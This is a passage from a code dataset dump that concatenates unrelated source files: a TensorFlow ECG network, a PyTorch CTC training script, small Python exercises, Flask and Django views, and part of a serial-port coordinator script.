deepecg.training.networks.layers import fc_layer, conv_layer, max_pool_layer, avg_pool_layer, \\\n batch_norm_layer, dropout_layer, print_output_shape\n\n\nclass DeepECGV4(object):\n\n \"\"\"\n Build the forward propagation computational graph for an Inception-V4 and ResNet inspired deep neural network.\n\n Szegedy, C., Ioffe, S., Vanhoucke, V. (2016) Inception-v4, inception-resnet and the impact of residual\n connections on learning (2016). arXiv:1602.07261\n \"\"\"\n\n def __init__(self, length, channels, classes, seed=0):\n\n # Set input parameters\n self.length = length\n self.channels = channels\n self.classes = classes\n self.seed = seed\n\n def inference(self, input_layer, reuse, is_training, name, print_shape=True):\n \"\"\"Forward propagation of computational graph.\"\"\"\n # Check input layer dimensions\n assert input_layer.shape[1] == self.length\n assert input_layer.shape[2] == self.channels\n\n # Define a scope for reusing the variables\n with tf.variable_scope(name, reuse=reuse):\n\n \"\"\"Block Series 1\"\"\"\n # --- Layer 1 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_1'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=input_layer, kernel_size=24, strides=1, dilation_rate=1,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 2 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_2'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=12, strides=1, dilation_rate=2,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 3 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_3'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=12, strides=1, dilation_rate=1,\n filters=128, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 2\"\"\"\n # --- Layer 4 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_4'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=4,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 5 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_5'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=1,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 6 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_6'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=6, strides=1, dilation_rate=8,\n filters=256, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Max pool\n net = max_pool_layer(input_layer=net, pool_size=3, strides=2, padding='SAME',\n name=layer_name + '_maxpool_ps3')\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 3\"\"\"\n # --- Layer 7 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_7'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 8 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_8'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=16,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 9 (Convolution) ------------------------------------------------------------------------------ #\n\n # Set name\n layer_name = 'layer_9'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Block Series 4\"\"\"\n # --- Layer 10 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_10'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=32,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 11 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_11'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=1,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n # --- Layer 12 (Convolution) ----------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'layer_12'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Convolution\n net = conv_layer(input_layer=net, kernel_size=3, strides=1, dilation_rate=64,\n filters=512, padding='SAME', activation=tf.nn.relu, use_bias=True,\n name=layer_name + '_conv_ks3_dr1', seed=self.seed)\n\n # Dropout\n net = dropout_layer(input_layer=net, drop_rate=0.3, seed=self.seed, training=is_training,\n name=layer_name + '_dropout')\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=net, print_shape=print_shape)\n\n \"\"\"Network Output\"\"\"\n # --- Global Average Pooling Layer ----------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'gap'\n\n # Set layer scope\n with tf.variable_scope(layer_name):\n # Reduce mean along dimension 1\n gap = tf.reduce_mean(input_tensor=net, axis=1)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=gap, print_shape=print_shape)\n\n # --- Softmax Layer -------------------------------------------------------------------------------------- #\n\n # Set name\n layer_name = 'logits'\n\n # Softmax activation\n logits = fc_layer(input_layer=gap, neurons=self.classes, activation=None, use_bias=False,\n name=layer_name, seed=self.seed)\n\n # Print shape\n print_output_shape(layer_name=layer_name, net=logits, print_shape=print_shape)\n\n # Compute Class Activation Maps\n cams = self._get_cams(net=net, is_training=is_training)\n\n return logits, net, cams\n\n def _get_cams(self, net, is_training):\n \"\"\"Collect class activation maps (CAMs).\"\"\"\n # Empty list for class activation maps\n cams = dict()\n\n # Compute class activation map\n if is_training is not None:\n for label in range(self.classes):\n cams[label] = self._compute_cam(net=net, label=label)\n\n return cams\n\n def _compute_cam(self, net, label):\n \"\"\"Compute class activation map (CAM) for specified label.\"\"\"\n # Compute logits weights\n weights = self._get_logit_weights(net=net, label=label)\n\n # Compute class activation map\n cam = tf.matmul(net, weights)\n\n return cam\n\n def _get_logit_weights(self, net, label):\n \"\"\"Get logits weights for specified label.\"\"\"\n # Get number of filters in the final output\n num_filters = int(net.shape[-1])\n\n with tf.variable_scope('logits', reuse=True):\n weights = tf.gather(tf.transpose(tf.get_variable('kernel')), label)\n weights = tf.reshape(weights, [-1, num_filters, 1])\n\n # Reshape weights\n weights = self._reshape_logit_weights(net=net, weights=weights)\n\n return weights\n\n @staticmethod\n def _reshape_logit_weights(net, weights):\n \"\"\"Reshape logits shapes to batch size for multiplication with net output.\"\"\"\n return tf.tile(input=weights, multiples=[tf.shape(net)[0], 1, 1])\n\n def create_placeholders(self):\n \"\"\"Creates place holders: waveform and label.\"\"\"\n with tf.variable_scope('waveform') as scope:\n waveform = tf.placeholder(dtype=tf.float32, shape=[None, self.length, self.channels], name=scope.name)\n\n with tf.variable_scope('label') as scope:\n label = tf.placeholder(dtype=tf.int32, shape=[None], name=scope.name)\n\n return waveform, label\n\n def create_generator(self, path, mode, batch_size):\n \"\"\"Create data generator graph operation.\"\"\"\n return DataGenerator(path=path, mode=mode, shape=[self.length, self.channels],\n batch_size=batch_size, prefetch_buffer=1500, seed=0, num_parallel_calls=32)\n\n @staticmethod\n def compute_accuracy(logits, labels):\n \"\"\"Computes the model accuracy for set of logits and labels.\"\"\"\n with tf.variable_scope('accuracy'):\n return tf.reduce_mean(tf.cast(tf.equal(tf.argmax(logits, axis=1), tf.cast(labels, tf.int64)), 'float'))\n\n def compute_f1(self, logits, labels):\n \"\"\"Computes the model f1 score for set of logits and labels.\"\"\"\n with tf.variable_scope('f1'):\n\n # Get prediction\n predictions = tf.cast(tf.argmax(logits, axis=1), tf.int32)\n\n # Get label\n labels = tf.cast(labels, tf.int32)\n\n return tf.py_func(func=self._compute_f1, inp=[predictions, labels], Tout=[tf.float64])\n\n @staticmethod\n def _compute_f1(predictions, labels):\n \"\"\"Compute the mean f1 score.\"\"\"\n return np.mean(f1_score(labels, predictions, labels=[0, 1, 2, 3], average=None)[0:3])\n\n","sub_path":"deepecg/training/networks/deep_ecg_v4.py","file_name":"deep_ecg_v4.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"293345773","text":"import argparse\n\nimport matplotlib.pyplot as plt\nimport sys\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom model.my_lstm import CustomLSTM\nfrom model.simple_mdlstm import SimpleModelMDLSTM\nfrom model.simple_model import SimpleModel\nfrom utils.image_helper import CustomDataSetSimple\nfrom utils.tensor_helper import to_best_device, do_load_model\n\nparser = argparse.ArgumentParser(description='Train the model.')\nparser.add_argument('--data', dest='data_path',\n help='Path to the folder containing training data', required=True)\nparser.add_argument('--models', dest='models_path',\n help='Path to the folder containing the models (load and save)', required=True)\nparser.add_argument('--epoch', dest='epoch', default=10,\n help='Path to the folder containing training data')\nparser.add_argument('--batch', dest='batch', default=10,\n help='Number of images per batch')\nparser.add_argument('--height', dest='height', default=80,\n help='Height of source images')\nparser.add_argument('--width', dest='width', default=80,\n help='Width of source images')\nparser.add_argument('--sentence', dest='sentence', default=10,\n help='Max length of sentences')\nparser.add_argument('--lr', dest='lr', default=0.0001,\n help='Learning rate')\nparser.add_argument('--max-lr', dest='max_lr', default=0.1,\n help='Max learning rate')\nparser.add_argument('--load', dest='load', default=False,\n help='Load model if true')\nparser.add_argument('--feat-mul', dest='feat_mul', default=15,\n help='Load model if true')\nargs = parser.parse_args()\n\ndata_path = args.data_path\nmodels_rep = args.models_path\nload_model = 'True' == args.load\nNUM_EPOCHS = int(args.epoch)\nBATCH_SIZE = int(args.batch)\nMOMENTUM = 0.9\nMAX_SENTENCE_LENGTH = int(args.sentence)\nLEARNING_RATE = float(args.lr)\nMAX_LR = float(args.max_lr)\nfeatures_multiplicity = int(args.feat_mul)\n\nif torch.cuda.is_available():\n print(\"CUDA will be used\")\nelse:\n print(\"CUDA won't be used\")\n\ndef imshow(inp):\n inp = inp.numpy()[0]\n mean = 0.1307\n std = 0.3081\n inp = ((mean * inp) + std)\n plt.imshow(inp, cmap='gray')\n plt.show()\n\nprint(f\"Loading dataset ...\")\nds = CustomDataSetSimple(nb_digit=MAX_SENTENCE_LENGTH, nb_samples=1000)\n#imshow(ds[5][0])\n#exit()\nprint(f\"...dataset loaded\")\ndataloader = DataLoader(ds, batch_size=int(len(ds) / 3), shuffle=True)\nmodel = to_best_device(SimpleModel())\nbest_model = to_best_device(SimpleModel())\n\n\nif load_model:\n if not do_load_model(models_rep, model):\n model.initialize_weights()\nelse:\n model.initialize_weights()\n\nmodel.train()\nloss = to_best_device(nn.CTCLoss(blank=10, zero_infinity=True, reduction=\"sum\"))\noptimizer = torch.optim.AdamW(model.parameters(), lr=LEARNING_RATE)\nscheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer,\n max_lr=MAX_LR,\n steps_per_epoch=int(len(dataloader)),\n epochs=NUM_EPOCHS,\n anneal_strategy='linear')\nstart = time.time()\nlosses = []\nmin_loss = sys.maxsize\ndo_save = True\nfor epoch in range(NUM_EPOCHS):\n running_loss = 0.0\n for i, batch_data in enumerate(dataloader):\n data_cpu, labels_cpu = batch_data\n data = to_best_device(data_cpu)\n labels = to_best_device(labels_cpu)\n optimizer.zero_grad()\n outputs = model(data)\n # Because outputs is of dimension (batch_size, seq, nb_chars) we have to permute the dimensions to fit cttloss\n # expected inputs\n outputs = outputs.permute(1, 0, 2) # seq, batch_size, nb_chars = outputs.shape\n bs = len(data)\n curr_loss = loss(nn.functional.log_softmax(outputs, 2), labels.flatten(),\n torch.tensor(bs * [outputs.shape[0]], dtype=torch.long),\n torch.tensor([len(label) for label in labels], dtype=torch.long))\n curr_loss.backward()\n optimizer.step()\n scheduler.step()\n running_loss += curr_loss.item()\n print(f'[{epoch}]Loss is {running_loss}')\n losses.append(running_loss)\n if running_loss < min_loss:\n do_save = True\n best_model.load_state_dict(model.state_dict())\n min_loss = running_loss\n else:\n if do_save:\n print(f'[{epoch}] Best loss so far is {min_loss} so we will save in best')\n torch.save(best_model.state_dict(), f\"{models_rep}/best.pt\")\n do_save = False\nend = time.time()\nprint(f\"It took {end - start}\")\nif do_save:\n print(f'[END] Best loss was {min_loss} so we will save in best')\n torch.save(best_model.state_dict(), f\"{models_rep}/best.pt\")\nplt.plot(losses)\nplt.show()\n","sub_path":"src/train_simple.py","file_name":"train_simple.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"323855120","text":"def nwd(x,y):\n tmp=0\n while y!=0:\n tmp = y\n y = x % y\n x = tmp\n return x\n\n\ndef nww(x,y):\n return x*int((y/nwd(x,y)))\n\nx, y, z= [int(x) for x in input(\"x y z: \").split()]\n\nprint( nww( nww(x,y),z ) )","sub_path":"wdi-1/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"223075814","text":"#!/usr/bin/env python\n\nimport random\n\nlist1 = []\nlist2 = []\nlist3 = []\nfor i in range(10):\n e = random.randrange(0,21)\n list1.append(e)\n\nfor i in list1:\n if list1.count(i) == 1:\n list2.append(i)\n else:\n if list3.count(i) == 0:\n list3.append(i)\n\nprint(list2)\nprint(list3)\nprint(list1)\n","sub_path":"P17083-贾璐/learn/list_training1-4.py","file_name":"list_training1-4.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"329944484","text":"\"\"\"\nK.Srinivas, 18-Jul-2018\n\nProject: Goal Sheet\nDescription: \n\nKNOWN BUGs: None\n\"\"\"\nimport logging\nimport json\nfrom flask_wtf import FlaskForm \nfrom wtforms import *\nfrom wtforms.validators import required, DataRequired, Length\nfrom flask_login import login_required, current_user\nfrom wtforms.fields import StringField, SelectField\nfrom wtforms.widgets import TextArea\nfrom flask import Flask, url_for\n#ForFileUpload\nfrom flask import send_from_directory, render_template, redirect, request, flash, session\nfrom werkzeug import secure_filename\nfrom flask_sqlalchemy import SQLAlchemy\nfrom goalmodel import *\nfrom realapp import app, db\nfrom goaldomain import *\nimport os\nfrom hrmsdomain import *\nimport datetime as dt\nfrom dateutil import parser\nfrom goalflags import * \nfrom hrmsempdata import getEmpDictbyEmail, getEmpDictbyEmpid\nfrom feedbackdomain import *\nfrom feedbackmodel import *\n\n\n##########################################################################################################################\n#### Display/Edit Goal-Sheet for end user ##############################\n#Key screen allowing an employee to see this goals, set-his targets and send for approval\n#Once Approved, He/She can only update tasks\n@app.route('/goals/feedbackviewmanager', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef feedbackViewManager( year = '2018-2019') :\n year = session['year']\n if not current_user.is_admin and not current_user.is_dclead and not current_user.is_Manager :\n return render_template('goalsheet/message.html', message = \"You are not authorized to access this page.\")\n loggedInEmpEmail = current_user.username.lower()\n loggedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n\n empIdStr = request.args.get('empid') \n if empIdStr and empIdStr.isdigit() : # If employee ID was n\n empId = int(empIdStr)\n else :\n return render_template('goalsheet/message.html', message = \"Internal Error.Please contact support with this message: Invalid empIdStr:\" + str(empIdStr))\n return feedbackViewGeneric(empId,loggedInEmpId, loggedInEmpEmail,\\\n current_user.is_admin , year, managerPage=True)\n\n\n@app.route('/goals/feedbackview', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef feedbackView( year = '2018-2019') :\n year = session['year']\n\n loggedInEmpEmail = current_user.username.lower()\n loggedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n return feedbackViewGeneric(loggedInEmpId,loggedInEmpId, loggedInEmpEmail, current_user.is_admin , year)\n\ndef feedbackViewGeneric(empId,loggedInEmpId, loggedInEmpEmail,is_admin, year, managerPage=False ) :\n loginedInEmpId = getEmpIdIntByEmail(loggedInEmpId)\n empDict = getEmpDictbyEmpid(str(empId))\n empEmail = empDict['OFFICE_EMAIL_ID']\n\n #Get list of Goals, group-by-sectio\n (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n # Get All the Tasks for these goals, grouped nicely by goal-ID\n if not sheet :\n return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. Please contact your DC Lead.\")\n msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n\n empInfo = getGoalSheetHeader(empEmail, year)\n empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n alltasks = getAllTasks(allgoals)\n\n #Set Authorization level = Check if its own item or someone else\n ownItem = False\n if (loginedInEmpId == sheet.empId) :\n ownItem = True\n authlevel = getAuthLevel(loggedInEmpId, ownItem, is_admin) # Get Auth Level\n #getComments\n (allSheetComments, allGoalComments, allTaskComments) = getAllComments(empId,sheet, allgoals, alltasks, authLevel = authlevel)\n #Render\n template = 'goalsheet/goalfeedback.html'\n if managerPage : template = 'goalsheet/goalfeedbackmanager.html'\n return render_template(template, goalSheet = sheet,\\\n goalSections = allgoalsections, \\\n goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n taskCmnts = allTaskComments, num=len(allgoalsections))\n\n\n\n\n#TODO: Visibility LEVEL needs to be implemented. For now, emp-visibility needs to be True\n@app.route('/goals/getTaskEmpFeedback', methods=['GET'])\n@login_required #Without login, we don't know who it is\ndef getTaskEmpFeedback(year = '2018-2019') :\n year = session['year']\n\n empEmail = current_user.username.lower()\n loginedInEmpId = getEmpIdIntByEmail(empEmail)\n# print(\"loginedInEmpId:\" + str(loginedInEmpId))\n taskIdStr = request.args.get('Task_id')\n if taskIdStr.isdigit() :\n tId = int(taskIdStr)\n else:\n return (\"Invalid Task\")\n alltfs = GoalFeedback.query.filter_by(elementId = tId). \\\n filter_by(visibleToEmp = True). \\\n filter_by(elementType = 3). \\\n all()\n# print(\"No. of comments: \" + str(len(alltfs)))\n mydict = {str(o.id) : (o.dateRecorded.strftime(\"%d-%m-%y\") , o.feedback) for o in alltfs }\n# print(mydict)\n return (json.dumps(mydict))\n \n\n##################################################################################################\n##################################################################################################\n# To be deleted later after testing -Srini\n##################################################################################################\n##################################################################################################\n##################################################################################################\n##################################################################################################\n# @app.route('/goals/xxxfeedbackview', methods=['GET'])\n# @login_required #Without login, we don't know who it is\n# def xxxfeedbackView( year = '2018-2019') :\n# empIdStr = request.args.get('empid') \n# if empIdStr and empIdStr.isdigit() : # If employee ID was n\n# empDict = getEmpDictbyEmpid(empIdStr)\n# empEmail = empDict['OFFICE_EMAIL_ID']\n# else :\n# empEmail = current_user.username.lower()\n# empInfo = getGoalSheetHeader(empEmail, year)\n# empId = str(empInfo['EmployeeID'])\n\n# #Get list of Goals, group-by-sectio\n# (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n# # Get All the Tasks for these goals, grouped nicely by goal-ID\n# if not sheet :\n# return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. Please contact your DC Lead.\")\n# msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n# empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n# alltasks = getAllTasks(allgoals)\n\n# #Set Authorization level = Check if its own item or someone else\n# ownItem = False\n# loginedInEmpId = getEmpIdIntByEmail(empEmail)\n# if (loginedInEmpId == sheet.empId) :\n# ownItem = True\n# authlevel = getAuthLevel(empEmail, ownItem, current_user.is_admin) # Get Auth Level\n# #getComments\n# (allSheetComments, allGoalComments, allTaskComments) = getAllComments(loginedInEmpId,sheet, allgoals, alltasks, authLevel = authlevel)\n# #Render\n# return render_template('goalsheet/goalfeedback.html', goalSheet = sheet,\\\n# goalSections = allgoalsections, \\\n# goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n# sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n# taskCmnts = allTaskComments, num=len(allgoalsections))\n\n# @app.route('/goals/xxxfeedbackviewmanager', methods=['GET'])\n# @login_required #Without login, we don't know who it is\n# def xxxfeedbackViewManager( year = '2018-2019') :\n# loggedInEmpEmail = current_user.username.lower()\n\n# empIdStr = request.args.get('empid')\n \n# if empIdStr and empIdStr.isdigit() : # If employee ID was n\n# empDict = getEmpDictbyEmpid(empIdStr)\n# empEmail = empDict['OFFICE_EMAIL_ID']\n# else :\n# return (\"error\")\n# empInfo = getGoalSheetHeader(empEmail, year)\n# empId = str(empInfo['EmployeeID'])\n# # print(\"empId = \" + empId)\n# #Get list of Goals, group-by-sectio\n# (sheet, allgoalsections, allgoals ) = getAllGoalsAndSections(empId, year)\n# # Get All the Tasks for these goals, grouped nicely by goal-ID\n# if not sheet :\n# return render_template('goalsheet/message.html', message = \"No Goals have been Assigned. Please contact your DC Lead.\")\n# msgDict = getEmpDictbyEmpid(sheet.assessingManager)\n# empInfo['Manager'] = msgDict[\"FIRST_NAME\"] + ' ' + msgDict[\"LAST_NAME\"]\n \n# alltasks = getAllTasks(allgoals)\n# #Set Flags\n# #Set Authorization level = Check if its own item or someone else\n# ownItem = False\n# loginedInEmpId = getEmpIdIntByEmail(loggedInEmpEmail)\n# if (loginedInEmpId == sheet.empId) :\n# ownItem = True\n# authlevel = getAuthLevel(loginedInEmpId, ownItem, current_user.is_admin) # Get Auth Level\n# print(\"getAuthLevel:\" + str(authlevel))\n# (allSheetComments, allGoalComments, allTaskComments) = getAllComments(int(empIdStr),sheet, allgoals, alltasks, authLevel = authlevel)\n# #Render\n# return render_template('goalsheet/goalfeedbackmanager.html', goalSheet = sheet,\\\n# goalSections = allgoalsections, \\\n# goals = allgoals, alltasks=alltasks, empInfo = empInfo, \\\n# sheetCmnts = allSheetComments, goalCmnts = allGoalComments, \\\n# taskCmnts = allTaskComments, num=len(allgoalsections))\n\n","sub_path":"EmpDash/empDash_Goalsheet_OnlineExam/realapp/modules/goalsheet/feedbackview.py","file_name":"feedbackview.py","file_ext":"py","file_size_in_byte":9648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"33164434","text":"from django.contrib.auth import logout, authenticate, login\nfrom django.shortcuts import render\n\n\ndef ventures_view(request):\n ventures = [\n {\n \"image\": \"glyphicon-book\",\n \"title\": \"Book Store\",\n \"description\":\n \"Your chain of bookstores Borders isn't doing so well.\"\n },\n {\n \"image\": \"glyphicon-phone-alt\",\n \"title\": \"Call Center\",\n \"description\":\n \"Your help office has collapsed, killing all the workers. \\\n But you have collected 200% with insurance fraud! \\\n You're a real tycoon!\"\n },\n {\n \"image\": \"glyphicon-music\",\n \"title\": \"Music Business\",\n \"description\":\n \"Your website Napster has been shutdown by U.S. authorities. \\\n Better luck next time.\"\n }\n ]\n\n currentVenture = {\n \"image\": \"glyphicon-briefcase\",\n \"title\": \"Current Venture\",\n \"description\": \"You're doing good! Keep it up!\"\n }\n\n return render(\n request,\n 'ventures.html',\n dict(\n ventures=ventures,\n currentVenture=currentVenture\n )\n )\n","sub_path":"controllers/ventures.py","file_name":"ventures.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"319036702","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Ver 18 - 15 November 2017 -\n\nimport time\nimport serial\nimport string\nimport sys\nimport mysql.connector\nfrom mysql.connector import errorcode, pooling\nfrom db import * \nimport datetime\n#from threading import Thread\nimport multiprocessing as mp\n#import queue\n\nctrlStr = \"*../\"\n\ndef output(x):\n\tprint(str(datetime.datetime.now().time())[:8] + \" \"+ str(x))\n\tsys.stdout.flush()\n# -- DB Connection ---------------------------\ntry:\n db = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n output(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n output(\"Database does not exists\")\n else:\n output(err)\nelse:\n output(\"Start procedure\")\n# -- END DB Connection ---------------------------\n\n# -- DB Connection ---------------------------\ntry:\n dbx = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n output(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n output(\"Database does not exists\")\n else:\n output(err)\nelse:\n output(\"Start procedure\")\n# -- END DB Connection ---------------------------\n\n\n\n# -- Open Serial to the Coordinator---------------\n\nserCoord = serial.Serial('/dev/ttymxc3', 115200, timeout=10)\n#serCoord = serial.Serial('COM5', 115200, timeout=5)\nserCoord.timeout = 10\n\nserCoord.setDTR(False)\ntime.sleep(1)\n# toss any data already received, see\nserCoord.flushInput()\n\n# -- End Open Serial to the Coordinator-----------\n \n#----------------------------- \n# Global Variable declaration \n#----------------------------- \n \nendSerialChars = b\"\\r\\n\"\n\nglobal readSerial \nglobal serialBuffer \n\npnum = 5 #number of values to send for each sensor \n\n# coordinator commands\nINString = \"IN\" # to send Node data to the coordinator\nISString = \"IS\" # to send Sensor data to the coordinator\nIXString = \"IX\" # to send Address data to the coordinator\nIAString = \"IA\" # to send Actuators to the coordinator\nIMString = \"IM\" # to send Methods to the coordinator\nCommExecutedTrue = b\"CX1\\r\\n\"\nCommExecutedFalse = b\"CX0\\r\\n\"\nCommExecutedTrueX = b\"CX1\"\nCommExecutedFalseX = b\"CX0\"\nCommNotExecuted = b\"X\"\n \n#----------------------------- \n# End Global Variable declaration \n#----------------------------- \n\n\n#-- function to extract integer from strings\ndef parseint(string):\n return int(''.join([x for x in string if x.isdigit()]))\n\ndef log(t, m):\n\t#curLog = db.cursor()\n\tsql = \"insert into tblog (type,msg) VALUES (%s, %s)\" \n\t#try:\n\t\t#curLog.execute(sql, (t,m))\n\t\t#db.commit()\n\t\t#curLog.close()\n\t#except:\n\t\t#raise\n\t#curLog.close()\t\n\ndef printTime():\n\tnow = datetime.datetime.now()\n\tprint(now.strftime(\"%H %M %S %f\"))\t\n\t\ndef checkInit():\n\t# check Init \n\tsql = \"SELECT pvalue,pindex FROM tbparam WHERE ptype = 'I'\" \n\tcur.execute(sql)\n\tfor (pvalue,pindex) in cur:\n\t\ti = int(\"{}\".format(pindex))\n\t\tif i == 1:\n\t\t\toutput (\"Initialize Coordinator\")\n\t\t\tsql = \"UPDATE tbparam SET pvalue = 0 WHERE ptype = 'I'\" \n\t\t\tcur.execute(sql)\n\t\t\tdb.commit()\n\t\t\tcur.close\n\t\t\tinitCoordinator()\n\t\t\tbreak\n\tsys.stdout.flush()\t\t\n\t# end check Init\n\t\n#-- Send Init data to the Coordinator --# \ndef initCoordinator(): \n\n\tprintTime()\n\toutput (\"Initializing...\")\n\n\tglobal pnum\n\tglobal 